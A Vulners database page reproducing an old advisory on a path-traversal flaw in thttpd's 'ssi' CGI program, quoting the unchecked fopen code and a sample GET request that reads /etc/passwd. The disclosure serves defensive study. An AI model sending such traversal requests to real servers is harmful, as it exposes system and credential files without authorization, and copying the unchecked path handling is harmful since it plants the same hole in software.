Vulners
Lucene search
`ssi ( server sides include ) is a cgi proggie that comes by default
with thttpd web server, I am not sure about others.
ssi has a nasty bug with regards to the PATH_TRANSLATED env var.
As you can see the contents of PATH_TRANSLATED get copied into path_translated
which get's fopen()'ed later.
It does no checking on the path_translated string. After it opens the file
it runs the read_file() function which returns the contents of fp.
So as you can plainly see we can view any file on the system.
try
GET /cgi-bin/ssi//../../../../../../../../../etc/passwd
this would yield the passwd file.
path_translated = getenv( "PATH_TRANSLATED" );
if ( path_translated == (char*) 0 )
{
internal_error( "Couldn't get PATH_TRANSLATED environment variable." );
exit( 1 );
}
/* Open it. */
fp = fopen( path_translated, "r" );
read_file( path_info, path_translated, fp );
`
Data
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation
27 May 2000 00:00Current